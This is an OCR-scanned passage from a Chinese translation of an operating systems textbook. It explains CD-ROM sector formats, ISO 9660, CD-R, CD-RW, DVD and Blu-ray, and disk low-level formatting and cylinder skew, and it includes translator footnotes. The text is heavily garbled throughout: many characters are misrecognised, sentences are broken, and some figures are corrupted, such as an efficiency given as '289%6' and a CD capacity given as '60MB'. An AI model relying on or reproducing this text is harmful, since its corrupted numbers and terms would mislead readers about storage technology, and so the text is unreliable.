纠 错 和 控制 。 在 这 396 位 中 ，252 位 是 14 位 符号 中 的 纠 错位 ， 而 144 位 包 








含 在 8 位 符号 的 有 效 载荷 中 心 。 到 目前 为 止 ， 这 一 方案 对 于 音频 CD 和 


CD-ROM 是 完全 一 致 的 。 


黄皮书 所 增加 的 是 将 98 帧 编组 为 一 个 CD-ROM 户 区 (CD-ROM 
sector) ， 如 图 5-22 所 示 。 每 个 CD-ROM 扇 区 以 一 个 16 字 节 的 前 导 码 开 
始 ， 其 中 前 12 个 字 节 为 00FFFFFFFFFFFFFFFFFFFF00 (十 六 进 制 ) ， 以 
便 让 播放 器 识别 一 个 CD-ROM 扇 区 的 开始 。 接 下 来 的 3 个 字 节 包含 局 区 
号 ， 这 是 必需 的 ， 因 为 在 具有 单个 数据 螺旋 的 CD-ROM 上 寻 道 比 在 具有 
均匀 同心 磁道 的 磁盘 上 寻 道 要 困难 得 多 。 为 了 进行 寻 道 ， 驱 动 器 中 的 软 
件 要 计算 出 一 个 近似 的 位 置 ， 将 激光 头 移动 到 那里 ， 然 后 开始 在 四 周 搜 
索 一 个 前 导 码 来 看 一 看 猜测 的 如 何 。 前 导 码 的 最 后 一 个 字 节 是 模式 。 








OO + OO 每 个 符号 包含 8 个 数据 位 和 6 个 纠 错位 





42 个 符号 构成 14X42=588 位 的 一 帧 


前 导 fig ”《24 字 节 〉 和 396 个 纠 错位 












98 帧 构成 一 个 肩 区 

模式 1 扇 区 
(2352 字 节 ) 
字 节 16 2048 288 


图 5-22 CD-ROM 上 的 逻辑 数据 布局 





黄皮书 定义 了 两 种 模式 。 模 式 1 使 用 图 5-22 的 布局 ， 具 有 16 字 节 的 
前 导 码 、2048 个 数据 字 节 和 一 个 288 字 节 的 纠 错 码 〈 横 交叉 Reed- 
Solomon 码 ) 。 模 式 2 将 数据 和 ECC 域 合并 成 一 个 2336 字 节 的 数据 域 ， 用 
于 不 需要 纠 错 《〈 或 者 抽 不 出 时 间 执 行 纠 错 ) 的 应 用 ， 例 如 音频 和 视频 。 


注意 ， 为 了 提供 优 蜡 的 可 靠 性 ， 在 符号 内 部 、 帧 内 部 和 CD-ROM 扇 区 内 
部 使 用 了 三 种 独立 的 纠 错 方案 。 单 个 位 的 错误 在 最 低 的 层次 上 纠正 ， 短 
暂 的 突 发 错误 在 帧 的 层次 上 纠正 ， 任 何 残 留 的 错误 在 情 区 的 层次 上 捕 

获 。 为 这 一 可 靠 性 付出 的 代价 是 花费 98 个 588 位 的 帧 (7203 字 节 ) 来 容 
纳 2048 字 节 的 有 效 载荷 ， 效 率 只 有 289%6。 


单 速 CD-ROM 驱 动 器 以 75 遍 区 / 秒 的 速度 工作 ， 提 供 的 数据 率 在 模 
式 1 下 是 153 600 字 节 / 秒 ， 在 模式 2 下 是 175 200 字 节 / 秒 。 双 速 驱 动 器 快 两 
倍 ， 以 此 类 推 ， 直 到 最 高 的 速度 。 因 此 ， 一 个 40 倍 速 的 驱动 器 能 够 以 
40x153 600 字 市 / 秒 的 速度 传递 数据 ， 假 设 驱 动 莫 接口 、 总 线 以 及 操作 系 
统 都 能 够 处 理 这 样 的 数据 率 。 一 个 标准 的 音频 CD 具有 存放 74 分 钟 首 乐 
的 空间 ， 如 果 将 其 用 于 在 模式 1 下 存放 数据 ， 提 供 的 容量 是 681 984 000 
字 节 。 这 一 数字 通常 被 报告 为 60MB， 这 是 因为 1IMB 是 220 字 节 (1 048 


576 字 节 ) ， 而 不 是 1 000 000 字 节 。 





注意 ， 即 使 一 个 32 倍 速 的 CD-ROM 了 驱动 器 (数据 率 为 4915 200 字 
节 / 秒 ) 也 无 法 与 速度 为 10MB/s 的 快速 SCSI-2 磁 盘 驱 动 器 相配 ， 尽 管 许 
多 CD-ROM 驱 动 器 使 用 了 SCSI 接 口 〈 也 存在 IDE CD-ROM3KA#) o 
你 意识 到 寻 道 时 间 通 常 是 几 百 毫秒 时 ， 就 会 清楚 CD-ROM 驱 动 器 与 磁盘 
驱动 器 在 性 能 上 不 属于 同样 的 范畴 ， 尽 管 它们 有 非常 大 的 容量 。 





1986 年 ， 飞 利 浦 以 绿 皮 书 (Green Book) 再 度 出 击 ， 补 充 了 图 形 以 
及 在 相同 的 扇 区 中 保存 交错 的 音频 、 视 频 和 数据 的 能 力 ， 这 对 于 多 媒体 








CD-ROM 而 言 是 十 分 必要 的 。 


CD-ROM 的 最 后 一 个 难题 是 文件 系统 。 为 了 使 相同 的 CD-ROM 能 够 
在 不 同 的 计算 机 上 使 用 ， 有 关 CD-ROM 文 件 系 统 的 协议 是 必要 的 。 为 了 
达成 这 一 协议 ， 许 多 计算 机 公司 的 代表 相聚 在 加 利 福 尼 亚 和 内 华 达 两 州 
边界 处 Tahoe 湖 昱 的 High Sierra 宾 馆 ， 设 计 了 被 他 们 称 为 High Sierra 的 文 
件 系统 ， 这 一 文件 系统 后 来 发 展 成 为 一 个 国际 标准 (IS 9660) 。 该 文件 
系统 有 三 个 层次 。 第 一 层 使 用 最 多 8 个 字符 的 文件 名 ， 可 选 地 跟随 最 多 3 
个 字符 的 扩展 名 〈MS-DOS 的 文件 命名 约定 ) 。 文 件 名 只 能 够 包含 大 写 
字母 、 数 字 和 下 划 线 。 目 录 能 够 对 套 最 多 8 层 深度 ， 但 是 目录 名 不 能 
含 扩 展 名 。 第 一 层 要 求 所 有 文件 都 是 连续 的 ， 这 对 于 只 能 写 一 次 的 介质 
来 说 并 不 是 一 个 问题 。 符 合 IS 9660 标 准 第 一 层 的 任何 CD-ROM 都 可 以 使 
用 MS-DOS、 苹 果 计 算 机 、UNIX 计 算 机 或 者 几乎 任何 其 他 计算 机 读 
出 。CD-ROM 出 版 商 十 分 看 重 这 一 特性 ， 视 其 为 重大 的 有 利 因 素 。 














IS 9660 第 二 层 允 许 文 件 名 最 多 有 32 个 字符 ， 第 三 层 允许 文件 是 不 连 
续 的 。Rock Ridge 扩 展 允 许 非常 长 的 文件 名 (针对 UNIX) ~ UID, GID 
和 符号 连接 ， 但 是 不 符合 第 一 层 标准 的 CD-ROM 将 不 能 在 所 有 计算 机 上 











对 于 出 版 各 种 游戏 、 电 影 、 百 科 全 书 、 地 图 集 以 及 参考 手册 ，CD- 
ROM 己 经 变 得 非常 流行 。 大 多 数 了 商业 软件 现在 也 是 通过 CD-ROM 发 行 
的 。 巨 大 的 容量 和 低廉 的 生产 成 本 相 结合 ， 使 得 CD-ROM 适 合 无 数 的 应 


4. 可 刻录 CD 





起 初 ， 制 造 一 片 CD-ROM 母 盘 〈 或 音频 CD 母 盘 ， 就 此 事 而 言 ) 所 
需要 的 设备 极其 昂贵 。 但 是 按照 计算 机 产业 的 惯例 ， 没 有 什么 东西 能 够 
长 久 地 保持 高 价位 。 到 20 世 纪 90 年 代 中 期 ， 尺 才 不 比 CD 播 放 器 大 的 CD 
刻录 机 在 大 多 数 计算 机 商店 中 已 经 是 可 以 买 到 的 常见 外 部 设备 。 这 些 设 
备 仍然 不 同 于 磁盘 ， 因 为 一 旦 写 入 ，CD-ROM 就 不 能 被 擦 除了 。 然 而 ， 
它们 很 快 就 找到 了 适当 的 位 置 ， 即 作为 大 容量 硬盘 的 备份 介质 ， 并 且 还 
可 以 让 个 人 或 刚 起 步 的 公司 制造 他 们 自己 的 小 批量 的 CD-ROM， 或 者 制 
作 母 盘 以 便 递交 给 高 产量 的 商业 CD 复制 工厂 。 这 些 驱 动 器 被 称 为 是 CD- 
R (CD-Recordable， 可 刻录 CD) 。 

















物理 上 ，CD-R 在 开始 的 时 候 是 像 CD-ROM 一 样 的 120mm 的 聚 碳酸 
酯 空 盘 ， 不 同 的 是 CD-R 包 含 一 个 0.6mm 宽 的 凹 槽 来 引导 激光 进行 写 操 
作 。 思 槽 具有 3mm 的 正弦 振幅 ， 频 率 精确 地 为 22.05 kHz， 以 便 提 供 连 
续 的 反馈 ， 这 样 就 可 以 正确 地 监视 旋转 速度 并 且 在 需要 的 时 候 对 其 进行 
调整 。CD-R 看 上 去 就 像 是 常规 的 CD-ROM， 只 是 CD-R 顶 面 是 金色 的 而 
不 是 银色 的 。 金 色 源 于 使 用 真 金 代 蔡 铝 作为 反射 层 。 银 色 的 CD 在 其 上 
具有 物理 的 凹陷 ， 与 此 不 同 的 是 ， 在 CD-R 上 ， 必 须 模拟 凹 痕 和 覃 兰 的 
不 同 反 射 率 。 这 是 通过 在 聚 碳酸 酯 与 反射 金 层 之 间 添 加 一 层 染 料 而 实现 
的 ， 如 图 5-23 所 示 。 使 用 的 染料 有 两 种 : 绿色 的 花 善 和 汉 桶 黄色 的 酝 














靖 。 至 于 哪 一 种 染料 更 好 化 学 家 们 可 能 会 无 休止 地 争论 下 去 。 这 些 染 料 
与 摄影 技术 中 使 用 的 染料 相 类 似 ， 这 就 解释 了 为 什么 柯达 和 富士 是 主要 
的 空白 CD-R 制 造 商 。 





印刷 标签 


染料 层 中 的 暗 斑 ， 
一 写 入 时 被 激光 烧 出 





运动 方向 





t fxg, 
光电 探测 器 -| 一 -上 上 -一 棱镜 


红外 激光 
二 极 管 


图 5-23 CD-R 盘 和 激光 的 横 截 面 (未 按 比例 画 ) 。 银 色 的 CD-ROM 具 
有 类 似 的 结构 ， 只 是 不 具有 染料 层 并 且 以 有 凹 痕 的 铝 层 代替 金 层 


在 初始 状态 下 ， 桨 料 层 是 透明 的 ， 能 够 让 激光 透 过 并 且 从 金 层 反射 
回来 。 写 入 时 ，CD-R 激 光 提 升 到 高 功率 〈8 一 16mW) 。 当 光束 遇 到 染 
料 时 ， 将 其 加 热 ， 从 而 破坏 其 化 学 结合 力 ， 这 一 分 子 结构 的 变化 造成 一 
个 暗 斑 。 当 读 回 时 《〈 以 0.5mW) ， 光 电 探测 器 会 识别 出 已 经 被 烧 过 的 染 
料 处 的 暗 斑 与 完好 的 透明 区 域 之 间 的 区 别 。 这 一 区 别 被 解释 为 凹 痕 与 模 
将 之 间 的 差别 ， 即 使 在 常规 的 CD-ROM 阅 读 器 甚至 在 音频 CD 播放 器 上 


读 回 时 ， 也 是 如 此 。 


如 果 没 有 一 本 “有 色 的 ” 书 ， 就 没有 CD 的 新 类 型 能 够 骄傲 地 昂 起 
头 ， 所 以 CD-R 具 有 桶 皮 书 (Orange Book) ， 出 版 于 1989 年 。 这 份 文档 
定义 了 CD-R 和 一 个 新 格式 CD-ROM XA， 它 允许 CD-R 被 逐渐 增长 地 写 
As 今天 几 个 扇 区 ， 明 天 几 个 扇 区 ， 下 个 月 几 个 扇 区 。 一 次 写 入 的 一 组 
连续 的 扇 区 称 为 一 个 CD-ROM 光 轨 (CD-ROM track) 。 





CD-R 的 最 初 应 用 之 一 是 柯达 PhotoCD。 在 这 一 系统 中 ， 消 费 者 将 一 
卷 已 曝光 的 胶片 和 老 的 PhotoCD 带 给 照片 加 工 者 ， 并 且 取 回 同一 个 
PhotoCD， 其 中 新 的 照片 已 经 添加 到 老 的 照片 之 后 。 新 的 一 批 照 片 是 通 
过 扫描 底片 创建 的 ， 它 们 作为 单独 的 CD-ROM 光 轨 写 在 PhotoCD E. 

$ 


于 昂 贯 ， 以 至 于 负担 不 起 为 每 个 胶卷 提供 一 张 盘 。 


然而 ， 逐 渐 增 长 式 写 入 造成 一 个 新 的 问题 。 在 橘 皮 书 之 前 ， 所 有 的 
CD-ROM 在 开始 处 有 一 个 VTOC (Volume Table of Contents， 卷 目 
K) 。 这 一 方法 对 于 逐渐 增长 式 〈 也 就 是 多 光 轨 ) 写 入 是 行 不 通 的 。 桶 
皮 书 的 解决 方案 是 给 每 个 CD-ROM 光 轨 提 供 自己 的 VTOC， 在 VTOC 中 
列 出 的 文件 可 以 包含 某 些 或 者 所 有 来 自 先 前 光 轨 中 的 文件 。 当 CD-R 被 
插入 到 驱动 器 之 后 ， 操 作 系 统 从 头 到 尾 搜索 所 有 的 CD-ROM 光 轨 以 定位 
最 近 的 VIOC， 它 提供 了 光盘 的 当前 状态 。 通 过 在 当前 VIOC 包 含 来 自 
先前 光 轨 中 的 某 些 而 不 是 全 部 文件 ， 可 能 会 引起 错觉 ， 即 文件 已 经 被 删 








除了 。 光 轨 可 以 被 分 组 成 段 (session) ， 这 样 就 引出 了 多 段 
(multisession) CD-ROM。 标 准 的 首 频 CD 播放 器 不 能 处 理 多 上 段 CD， 
为 它们 要 求 在 开始 处 有 一 个 VTOC。 可 是 ， 某 些 计算 机 应 用 程序 可 以 处 
FEE AIT. 


CD-R 使 得 个 人 和 公司 轻松 地 复制 CD-ROM (和 音频 CD〉 成 为 可 
能 ， 只 是 通常 会 侵犯 出 版 商 的 版 权 。 人 们 设计 了 几 种 方案 使 这 种 盗版 行 
为 更 加 困难 ， 并 且 使 除了 出 版 商 的 软件 以 外 的 任何 软件 都 难于 用 来 读 取 
CD-ROM。 方 案 之 一 是 在 CD-ROM 上 将 所 有 文件 的 长 度 记 录 为 几 吉 字 
节 ， 从 而 挫败 任何 使 用 标准 复制 软件 将 文件 复制 到 硬盘 上 的 企图 。 实 际 
的 文件 长 度 对 入 在 出 版 商 的 软件 中 ， 或 者 隐藏 〈 可 能 是 加 密 的 ) 在 CD- 
ROM 上 意 想 不 到 的 地 方 。 另 一 种 方案 是 在 挑选 出 来 的 扇 区 中 故意 使 用 
错误 的 ECC， 期 望 CD 复 制 软件 将 会 “修正 ”这 些 错误 ， 而 应 用 程序 软件 
则 核对 ECC 本 身 ， 如 果 是 正确 的 就 拒绝 工作 。 使 用 光 轨 间 非 标准 的 间 际 
和 其 他 物理 “ 瑕 站 ?也 是 可 能 的 。 











5.7] 2 SCD 


尽管 人 们 习惯 于 使 用 其 他 一 次 性 写 的 介质 ， 例 如 纸张 和 摄影 胶片 ， 
但 是 却 存 在 着 对 可 重 写 CD-ROM 的 需求 。 目 前 可 用 的 一 个 技术 是 CD- 
RW 〈CD-ReWritable， 可 重 写 CD) ， 它 使 用 与 CD-ROM 相 同 尺 寸 的 介 
质 。 然 而 ，CD-RW 使 用 银 、 钢 、 匀 和 兢 合金 作为 记录 层 ， 以 取代 花 苹 


和 酌 背 染料 。 这 一 合金 具有 两 个 稳定 的 状态 : 结晶 态 和 非 结 晶 态 ， 两 种 














状态 具有 不 同 的 反射 率 。 


CD-RW 驱 动 器 使 用 具有 三 种 不 同 功 率 的 激光 。 在 高 功率 下 ， 激 光 
将 合金 融化 ， 将 其 从 高 反射 率 的 结晶 态 转化 为 低 反 射 率 的 非 结晶 态 ， 代 
表 一 个 凹 痕 。 在 中 功率 下 ， 激 光 将 合金 融化 并 重 构 其 目 然 结晶 状 态 以 便 
再 次 成 为 一 个 槽 疹 。 在 低 功率 下 ， 材 料 的 状态 被 感知 《用 于 读 取 ) ， 但 
古 不 发 生 状 态 的 转化 。 


CD-RW 没 有 取代 CD-R 的 原因 是 CD-RW 空 白 盘 比 CD-R 空 白 盘 要 昂 
贯 得 多 。 此 外 ， 对 于 涉及 对 硬盘 进行 备份 的 应 用 程序 来 说 ， 实 际 情况 就 
是 一 次 性 写 入 ，CD-R 不 会 被 意外 地 擦 除 是 一 大 好 事 。 


6.DVD 


基本 CD/CD-ROM 格 式 自 1980 年 以 来 经 受 了 考验 。 从 那 时 起 ， 技 术 
在 不 断 改进 ， 所 以 更 高 容量 的 光盘 现在 在 经 济 上 是 可 行 的 ， 并 且 存 在 着 
对 它们 的 巨大 需求 。 好 莱 坞 热切 地 希望 用 数字 光盘 来 取代 模拟 录像 磁 
带 ， 因 为 光盘 具有 更 高 的 容量 ， 更 低廉 的 制造 成 本 ， 更 长 的 使 用 时 间 ， 
占用 音像 商店 更 少 的 货架 空间 ， 并 且 不 必 倒 带 。 消 费 性 电子 公司 正 期 待 
着 一 种 新 型 的 一 鸣 惊 人 的 产品 ， 而 许多 计算 机 公司 则 希望 为 他 们 的 软件 
增添 多 媒体 特性 。 











这 三 个 极其 富有 并 且 势 力 强 大 的 产业 在 技术 与 需求 方面 的 结合 引出 
了 了 DVD， 最初 DVD 是 Digital Video Disk 〈 数 字 祝 盘 ) 的 首 字母 缩写 ， 但 





是 现在 官方 的 名 称 是 Digital Versatile Disk 〈 数 字 通 用 光盘 ) 。DVD 采 用 
与 CD 同样 的 总 体 设 计 ， 使 用 120 mm ER RRB, LSD AN 
槽 疹 ， 它 们 由 激光 二 极 管 照明 并 且 由 光电 探测 器 读 取 。 新 特性 包括 使 用 
J: 


1) 更 小 的 四 六 (0.4m, CD#0.8pm) 。 
2) 更 密 的 螺旋 (轨迹 间距 0.74nm，CD 是 1.6pnm) 。 


3) 红 色 激 光波 长 0.65pm，CD 是 0.78pm) 。 





综合 起 来 ， 这 些 改进 将 容量 提高 了 7 倍 ， 达 到 4.7GB。 一 个 1 倍速 的 
DVD 驱动 器 以 1.4 MB/s 的 速率 运转 (CD 是 150 KB/s) 。 但 是 ， 切 换 到 红 
色 激 光 意 味 着 DVD 播放 器 需要 第 二 个 激光 器 或 者 价格 高 昂 的 光学 转换 器 
才能 够 读 取现 有 的 CD 和 CD-ROM。 随 着 激光 器 价格 的 下 降 ， 现 在 大 多 
数 驱 动 器 都 有 两 种 激光 器 ， 所 以 它们 能 够 读 取 两 种 类 型 的 介质 。 


是 不 是 4.7GB 就 足够 了 ? 也 许 是 。 采 用 MPEG-2 压 缩 〈 在 IS 13346 中 
标准 化 ) ， 一 块 4.7GB 的 DVD 盘 能 够 保存 133 分 钟 高 分 辨 率 〈720x480 ) 
的 全 屏幕 、 全 运动 视频 ， 以 及 最 多 8 种 语言 的 音 轨 和 最 多 32 种 语言 的 字 
幕 。 好 莱 雹 曾经 制作 的 全 部 电影 中 大 约 92% 在 133 分 钟 以 下 。 然 而 ， 革 
些 应 用 《例如 多 媒体 游戏 或 者 参考 手册 ) 可 能 需要 更 多 的 空间 ， 并 且 好 
莱 坞 希望 将 多 部 电影 放 在 同一 张 盘 上 ， 为 此 定义 了 四 种 格式 : 











1) 单 面 单 层 (4.7GB) 。 
2) 单 面 双 层 (8.5GB) 。 
3) 双 面 单 层 (9.4GB) 。 


AHNE (17GB) 。 





为 什么 要 如 此 多 种 格式 ? 一 句 话 : 政治 利益 。 飞 利 浦和 索尼 对 于 高 
容量 的 版 本 硕 望 来 用 单 面 双 层 盘 ， 而 东芝 和 时 代 华 纳 则 希望 采用 双 面 单 
层 盘 。 飞 利 浦和 索尼 认为 人 们 不 会 愿意 将 盘 片 翻 面 ， 而 东芝 和 时 代 华 纳 
则 不 相信 将 两 层 放 在 一 面 能 够 工作 。 受 协 是 支持 全 部 组 合 ， 但 古市 场 将 
决定 哪些 格式 会 生存 下 来 。 











双 层 技术 在 底部 具有 一 个 反射 层 ， 在 上 面 加 上 一 个 半 反 射 层 。 激 光 
从 一 层 还 是 从 驴 一 层 反 射 回来 取决 于 激光 在 何 处 汇聚 。 下 面 一 层 需 要 稍 
微 大 一 些 的 止 痕 和 槽 将 ， 以 便 可 靠 地 读 出 ， 所 以 其 容量 比 上 面 一 层 稍微 


小 一 些 。 














双 面 盘 是 通过 采用 两 片 0.6 mm 的 单 面 盘 并 且 将 它们 背 对 背地 粘 合 在 
一 起 做 成 的 。 为 了 使 所 有 版 本 的 厚度 相同 ， 单 面 盘 包含 一 个 0.6 mm 的 盘 
片 ， 粘 合 在 一 片 空白 的 基底 上 “或 者 也 许 在 将 来 是 粘 合 在 一 个 包含 133 
分 钟 广告 的 嫩 上 ， 期 望 人 们 会 好 奇 其 中 包含 什么 ) 。 双 面 双 层 盘 的 结构 
如 图 5-24 所 示 。 
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图 5-24 ” 双 面 双 层 DVD 盘 


DVD 是 由 10 家 消费 性 电子 公司 的 联盟 在 主要 的 好 羔 坞 制 片 三 的 紧密 
协作 下 设计 的 ， 其 中 7 家 是 日 本 公司 ， 而 其 中 一 些 好 莱 坞 制 睫 三 也 是 由 
联盟 中 的 日 本 电子 公司 所 拥有 。 计 算 机 与 电信 产业 未 被 邀请 参加 这 一 野 
和 餐 会 ， 导 致 的 结果 是 注意 力 集中 在 将 DVD 用 于 电影 租赁 与 营业 性 放映 
上 。 例 如 ， 标 准 特性 包括 实时 跳 过 色情 场景 (使 父母 得 以 将 一 部 等 级 为 
NC17 |! 的 影片 转变 成 对 儿童 安全 的 影片 ) ， 包 含 六 声 道 声音 ， 并 且 支 
持 摇 摄 及 扫描 。 最 后 一 个 特性 是 允许 动态 地 决定 如 何 将 电影 (其 宽 高 比 
为 3:2) WAM AWA US SHA C E a LL 
AS) a 
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给 欧洲 的 光盘 以 及 适用 于 其 他 大 陆 的 其 他 标准 之 间 故 意 不 兼容 。 因 为 新 
影片 总 是 首先 在 美国 及 行 ， 然 后 当 视 频 产 品 在 美国 上 市 的 时 候 再 输出 到 
欧洲 ， 所 以 好 莱 坞 需要 这 一 “特性 ”。 这 一 主意 可 以 确保 欧洲 的 音像 商店 
不 能 过 早 地 在 美国 买 到 视频 产品 ， 因 而 减少 新 电影 在 欧洲 的 票房 收入 。 








如 果 计 算 机 产业 是 由 好 业 坞 来 运作 的 ， 那 么 就 会 在 美国 只 能 使 用 3.5 英 
寸 的 软盘 而 在 欧洲 只 能 使 用 9 厘米 的 软盘 。 





发 明 单 面 / 双 面 和 单 层 / 双 层 DVD 的 那些 人 再 一 次 陷入 混战 。 由 于 产 
业界 参与 者 政治 上 的 争论 ， 下 一 代 DVD 仍 然 缺 乏 单一 的 标准 。 一 种 新 的 
设备 是 Blu-ray〔 蓝 光 光 盘 ) ， 它 使 用 0.405(m( 蓝 色 ) 激光 将 25 GB 压 入 
单 层 盘 中 ， 或 者 将 50GB 压 入 双 层 盘 中 。 另 一 种 设备 是 HD DVD, € 
使 用 相同 的 蓝 色 激 光 ， 但 是 容量 只 有 15 GB CE) 或 者 30 GB OX 
JZ) 。 这 种 格式 之 战 将 电影 制 片 广 、 计 算 机 制造 商 和 软件 公司 割裂 开 
来 。 缺 乏 标准 的 结果 是 ， 这 一 代 DVD 推 广 得 非常 慢 ， 因 为 消费 者 在 等 待 
着 尘埃 落 定 ， 看 哪 一 个 格式 胜出 。 产 业界 这 些 愚蠢 的 行为 让 人 想起 
George Santayana'°! 的 名 言 : “不 能 以 史 为 鉴 的 人 注定 要 重 蹈 履 略 ”。 











[1] MPG 是 Miles Per Gallon 的 缩写 ， 即 每 加 仓 燃油 可 以 跑 多 少 英里 。 各 国 
政府 对 车 辆 燃油 经 济 性 的 要 求 越 来 越 高 ， 目 前 30 ”MPG 标准 成 为 衡量 各 
家 公司 车 型 竞争 力度 的 标杆 。 一 一 译 者 注 

[2] 该 编码 系统 称 为 EFM (Eight to Fourteen Modulation，8 到 14 调 制 ) 编 
译 者 








码 ， 就 是 把 一 个 8 位 的 数据 ( 即 1 个 字 节 ) 用 14 位 编码 来 表示 。 
23 

[3] 此 处 的 描述 不 其 准确 。 在 588 位 的 一 帧 数据 中 ， 有 24 位 同步 信息 (这 
24 位 同步 位 不 经 EFM 编 码 ) 和 33 个 数据 字 节 (每 个 字 节 经 过 14 位 EFM 编 


码 ) 。 在 33 个 数据 字 节 中 ， 包 含有 效 数 据 〈 或 称 有 效 载荷 ) 24 字 节 ， 其 


余 9 字 节 用 于 控制 和 校 验 。 为 了 确保 读 出 信号 的 可 靠 性， 每 个 编码 字 之 
间 插 入 3 位 结合 位 ， 在 帧 尾 还 有 3 位 结合 位 ， 因 此 一 帧 的 长 度 为 

24+33 X 14+34X3=588 位 。 一 -一 译 者 注 

[4] NC17 代 表 No Children Under 17 Admitted， 即 17 岁 以 下 儿童 不 得 观 
看 。 译 者 注 


[5] HD 代表 High Density (高 密度 ) 。 








译 者 注 
[6] George Santayana (乔治 " 桑 塔 亚 纳 ，1863-1952) ， 美 国 著名 哲学 家 、 
译 者 注 





5.4.2 Werth ry 
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英寸 〈 在 笔记 本 电脑 上 甚至 更 小 ) 。 在 每 个 盘 片 上 沉积 着 薄 薄 的 可 磁化 
的 金属 氧化 物 。 在 制造 出 来 之 后 ， 破 盘 上 不 存在 任何 信息 。 


在 磁盘 能 够 使 用 之 前 ， 每 个 盘 卢 必须 经 受 由 软件 完成 的 低级 格式 化 
(low-level format) 。 该 格式 包含 一 系列 同心 的 磁道 ， 每 个 磁道 包含 重 
二 数目 的 扇 区 ， 局 区 间 存 在 短 的 间隙 。 一 个 夯 区 的 格式 如 图 5-25 所 示 。 








图 5-25 一 个 磁盘 局 区 


前 导 码 以 一 定 的 位 模式 开始 ， 位 模式 使 硬件 得 以 识别 扇 区 的 开始 。 
前 导 码 还 包含 柱 面 与 扇 区 号 以 及 某 些 其 他 信息 。 数 据 部 分 的 大 小 是 由 低 
级 格式 化 程序 决定 的 ， 大 多 数 磁 盘 使 用 512 字 节 的 鹿 区 。ECC 域 包含 元 
余 信息 ， 可 以 用 来 恢复 读 错误 。 该 域 的 大 小 和 内 容 随 生产 商 的 不 同 而 不 
同 ， 它 取决 于 设计 者 为 了 更 高 的 可 靠 性 愿意 放弃 多 少 人 磁盘 空间 以 及 控制 
器 能 够 处 理 的 ECC 编 码 有 多 复杂 。16 字 节 的 ECC 域 并 不 是 罕见 的 。 此 
外 ， 所 有 硬盘 都 分 配 有 某 些 数目 的 备用 局 区 ， 用 来 取代 具有 制造 瑕 症 的 
扇 区 。 





在 设置 低级 格式 时 ， 每 个 磁道 上 第 0 书 区 的 位 置 与 前 一 个 磁道 存在 
偏 移 。 这 一 偏 移 称 为 柱 面 斜 进 (cylinder skew) ， 这 样 做 是 为 了 改进 性 
能 ， 想 法 是 让 磁盘 在 一 次 连续 的 操作 中 读 取 多 个 磁道 而 不 丢失 数据 。 观 
侍 图 5-19a 惑 可 以 明日 问题 的 本 质 。 假 设 一 个 读 请 求 希 要 最 内 侧 磁道 上 
从 第 0 忆 区 开始 的 18 个 忆 区 ， 磁 盘旋 转 一 周 可 以 读 取 前 16 个 面 区 ， 但 是 
为 了 得 到 第 17 个 局 区 ， 则 需要 一 次 寻 道 操作 以 便 磁头 回 外 移动 一 个 磁 
道 。 到 磁头 移动 了 一 个 磁道 时 ， 第 0 扇 区 已 经 转 过 了 磁头 ， 所 以 需要 旋 
转 一 整 周 才能 等 到 它 再 次 经 过 人 磁头。 通过 图 5-26 所 示 的 将 局 区 偏 移 即 可 


消除 这 一 问题 。 











图 5-26 柱 面 斜 进 示意 图 


柱 面 斜 进 量 取 决 于 驱动 占 的 几何 规格 。 例 如 ， 一 个 10 000rpm 的 驱 
动 占 每 6ms 旋 转 一 周 ， 如 果 一 个 磁 违 包含 300 个 而 区 ， 那 么 每 20ps 束 有 一 
个 新 厨 区 在 人 磁 尖 下 通过 。 如 果 磁 道 到 磁道 的 寻 道 时 间 是 800ps， 那 么 在 
寻 着 期间 将 有 40 个 而 区 通过 ， 上 所 以 柱 面 斜 进 应 该 是 40 个 而 区 而 不 是 图 5- 








26 中 的 三 个 悄 区 。 值 得 一 提 的 是 ， 像 柱 面 斜 进 一 样 也 存在 着 人 磁头 和 斜 进 
(head skew) ， 但 是 磁头 斜 进 不 是 非常 大 。 





低级 格式 化 的 结果 是 磁盘 容量 减少 ， 减 少 的 量 取决 于 前 导 码 、 届 区 
间 间 隙 和 ECC 的 大 小 以 及 保留 的 备用 鹿 区 的 数目 。 通 币 格 式 化 的 容量 比 
未 格式 化 的 容量 低 20%。 备 用 局 区 不 计 入 格式 化 的 容量 ， 所 以 一 种 给 定 
类 型 的 所 有 磁盘 在 出 上 时 具有 完全 相同 的 容量 ， 与 它们 实际 具有 多 少 坏 
而 区 无 关 《〈 如 宋 坏 书 区 的 数目 超出 了 备用 忆 区 的 数目 ， 则 该 驱动 器 是 不 
合格 的 ， 不 会 出 三 ) 。 











关于 磁盘 容量 存在 着 相当 大 的 混淆 ， 这 是 因为 菜 些 制造 商 广 告 宣传 
的 是 未 格式 化 的 容量 ， 从 而 使 他 们 的 驱动 器 看 起 来 比 实 际 的 容量 要 大 。 
例如 ， 考 虑 一 个 未 格式 化 容量 为 200x109 字 节 的 驱动 器 ， 它 或 许 是 作为 
200GB 的 磁盘 销售 的 。 然 而 ， 格 式 化 之 后 ， 也 许 只 有 170x10? 字 节 可 用 
于 存放 数据 。 使 这 一 混淆 进一步 加 剧 的 是 操作 系统 可 能 将 这 一 容量 报告 
为 158GB， 而 不 是 170GB， 因 为 软件 把 GB 看 作 是 2 (1 073 741 824) 
字 节 ， 而 不 是 10? (1 000 000 000) F. 


在 数据 通信 世界 里 ，1Gbps 意 味 着 1 000 000 000 位 / 秒 ， 因 为 前 绥 
G CF) 确实 表示 10” (毕竟 一 干 米 是 1000 米 ， 而 不 是 1024 米 ) ， 所 以 
使 事情 更 加 糟糕 。 只 有 在 关于 内 存 和 磁盘 的 大 小 的 情况 下 ， 
kilo (F) . mega (JK) ~ giga CGF) Mtera CK) 才 分 别 表 示 210 、220 


、230 和 240 。 


格式 化 还 对 性 能 产生 影响 。 如 有 果 一 个 10 000RPM 的 磁盘 每 个 磁道 有 
300 个 而 区 ， 每 个 面 区 512 字 节 ， 那 么 用 6ms 可 以 读 出 一 个 磁道 上 的 153 
600 字 市 ， 使 数据 率 为 25 600 000 字 市 / 秒 或 24.4 MB/s。 不 论 引 入 什么 种 
类 的 接口 ， 都 不 可 能 比 这 个 速度 更 快 ， 即 便 是 80 MB/s 或 160 MB/s 的 
SCSI 接 口 也 不 行 。 


实际 上 ， 以 这 一 速率 连续 地 读 磁盘 要 求 控制 器 中 有 一 个 大 容量 的 组 
冲 区 。 例 如 ， 考 碟 一 个 控制 器 ， 它 具有 一 个 鹿 区 的 缓冲 区 ， 该 控制 器 接 
到 一 条 命令 要 读 两 个 连续 的 扇 区 。 当 从 磁盘 上 读 出 第 一 个 局 区 并 做 了 
ECC 计 算 之 后 ， 数 据 必须 传送 到 主 存 中 。 就 在 传送 正在 进行 时 ， 下 一 个 
